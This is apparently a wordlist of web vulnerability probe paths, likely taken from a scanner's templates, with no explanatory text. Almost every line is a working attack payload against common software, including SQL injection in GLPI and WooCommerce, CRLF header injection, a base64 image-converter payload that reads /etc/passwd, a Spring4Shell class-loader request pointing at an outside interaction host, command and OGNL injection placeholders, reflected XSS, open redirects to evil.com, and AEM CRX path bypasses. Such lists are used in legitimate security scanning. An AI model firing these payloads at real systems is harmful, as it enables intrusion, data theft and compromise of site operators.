/cgi-bin/login?LD_DEBUG=files
/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/cgi-bin/file_transfer.cgi
/auth/check
/auth/newpassword
/cgi-bin/weblogin.cgi?username=admin
/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0
/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/homeaction.php
/lab.html?vpath=//interact.sh
/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}
/auth/requestreset
/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0
/lab.html?vpath=//example.com
/?class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500
/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500
/openam/ui/PWResetUserValidation
/OpenAM-11.0.0/ui/PWResetUserValidation
/ui/PWResetUserValidation
/action.php
/scrm/crm/admin
/squirrelmail/src/login.php
//webmail/src/login.php
/!!!ATENTION!!!_This_site_is_on_Maintenance_please_go_to_WWW.EVIL.COM
/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}
/%5cgoogle.com/evil.html
/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1
/login.php
/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7
/plugins/weathermap/configs/poc.conf
/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C
/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<test>
/crx/nl/setPreferences.jsp;%0A.html?language=en&keymap=<test>
/crx/en/setPreferences.jsp;%0A.html?language=en&keymap=<test>
/crx/us/setPreferences.jsp;%0A.html?language=en&keymap=<test>
/crx/de/setPreferences.jsp;%0A.js?language=en&keymap=<test>
/crx/de/setPreferences.jsp?language=en&keymap=<test>
/content/..;/crx/de/setPreferences.jsp;%0A.js?language=en&keymap=<test>
/content/..;/crx/de/setPreferences.jsp?language=en&keymap=<test>
/content/crx/de/setPreferences.jsp;%0A.js?language=en&keymap=<test>
/content/crx/de/setPreferences.jsp?language=en&keymap=<test>
